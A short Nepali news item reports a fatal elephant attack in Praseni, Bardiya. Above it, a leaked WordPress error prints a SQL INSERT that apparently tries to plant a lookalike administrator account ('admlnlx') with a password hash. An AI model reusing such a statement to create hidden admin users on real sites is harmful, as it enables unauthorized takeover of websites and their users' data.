WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BwnSummFcP2XsslZSWJmCnKnullcsQ0', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-15 02:26:51', '', 'admlnlx', 'admlnlx')
बर्दिया, पुस १३–
बर्दियाको प्रसेनी बजारमा हातीको आक्रमणबाट एक जनाको मृत्यु भएको । यस्तै हात्तीको आक्रमणमा परि दुई जना गम्भीर घाइते भएका छन् ।
आज बिहान सात बजेतिर बर्दिया राष्ट्रिय निकुञ्जको जंगलबाट बस्तीमा पसेको हातीको आक्रमणबाट प्रसेनीका विमल परियारको मृत्यु भयो भने प्रसेनीकै रामप्रसाद लामिछाने र दिनेशसिंह ठकुरी घाइते भएका छन् ।
एक्कासी गाउँमा जंगली हाती प्रवेश गरेपछि स्थानीयको भागाभाग भएको थियो ।
तस्विरः फाईल